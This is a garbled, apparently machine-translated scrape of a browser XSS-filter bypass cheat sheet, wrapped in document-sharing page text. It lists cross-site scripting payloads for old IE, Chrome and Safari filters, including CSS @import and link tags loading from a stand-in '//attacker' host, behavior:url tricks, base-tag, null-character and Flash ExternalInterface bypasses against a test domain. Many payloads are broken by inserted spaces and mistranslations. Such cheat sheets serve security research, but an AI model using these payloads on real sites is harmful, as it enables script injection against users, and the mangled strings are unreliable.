https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport
'//attacker'%3C/style%3E
< svg > < style > & commat; import '// attacker' </ style >
q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27//attacker%27%3C/style%3E
< svg > < style > @ & bsol; 0069mport '// attacker' </ style >
(IE + IE 10 mode only) https://vulnerabledoma.in/bypass/text?

q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10
< p style = " behavior & colon; url ('/ bypass / usercontent / xss.txt') " >
(IE + IE 10 mode only) https://vulnerabledoma.in/bypass/text?

q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10
< p style = " behavior: url & lpar; '/bypass/usercontent/xss.txt') " >
Past bypass
Posted at Fixed Bypass Archive .

Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub

Uploaded by

Copyright:

Available Formats

Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub

Uploaded by

Copyright:

Available Formats

1/1/2018 Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub

Browser's XSS Filter Bypass Cheat Sheet

table of contents Clone this wiki locally

All DOM based XSS

Those not to be blocked

XSS occurring in string literals

When there are two or more injection points

When there is manipulation of a character string

< svg o < script > nload = alert (1)>

< script > / & / - alert ( 1 ) < / script >

document.write() DOM based XSS other than request strings

< body >

https://vulnerabledoma.in/bypass/dom_redirect#javascript: alert (1)

< script >

XSS in XML page

http (s): Create link

A tag that can send requests to the outside

Describe any CSS

< Style > Attoimport ' //Attacker/test.Css ' </ Style>

< link rel = stylesheet href = //attacker/test.css >

<object> And the <param name=url/code> use of (Chrome only)

1. There is an XSS that can write arbitrary tags

Using the values attribute of SVG animation (Safari only)

1. There is an XSS that can write arbitrary tags

Use of multiple null characters (Safari only)

1. There is an XSS that can write arbitrary tags

Using --> comments in script tag (Safari only)

1. There is an XSS that can write arbitrary tags

< div > < script > alert ( 1 )

Using an odd base tag (Safari only)

1. There is an XSS that can write arbitrary tags

2. There is no space character immediately after, '" there is after

(If there is no space character immediately after) https://vulnerabledoma.in/bypass/text?

(If there is a space character immediately after) https://vulnerabledoma.in/bypass/text?

Using a script loaded with relative URL

1. There is an XSS that can write arbitrary tags

Use of ISO-2022-JP escape sequence

1. There is an XSS that can write arbitrary tags

Use link and odd base tag

1. There is an XSS that can write arbitrary tags

https://vulnerabledoma.in/bypass/text?type=4&q=%3Ca%20href=/**/alert (1)% 3EXSS% 3C / a%

Use of resources of the same domain

Case where XSS is on path (Chrome only)

1. XSS in arbitrary tag can be written in path

File upload function

1. There is an XSS that can write arbitrary tags

< script src = /bypass/usercontent/xss.js > </ script >

(Chrome only) https://vulnerabledoma.in/bypass/text?

< link rel = import href = /bypass/usercontent/icon.jpg >

And Flash flashvars use of

1. There is an XSS that can write arbitrary tags

ExternalInterface . Call ( "setTimeout" , ExternalInterface . ObjectID + '_event' + "(''

Flash of ExternalInterface.objectID the ExternalInterface.call() use of

1. There is an XSS that can write arbitrary tags

ExternalInterface . Call ( ExternalInterface . ObjectID Tasu '_Init' ) ;

1. There is an XSS that can write arbitrary tags

(Chrome only) https://vulnerabledoma.in/bypass/text?

1. There is an XSS that can write arbitrary tags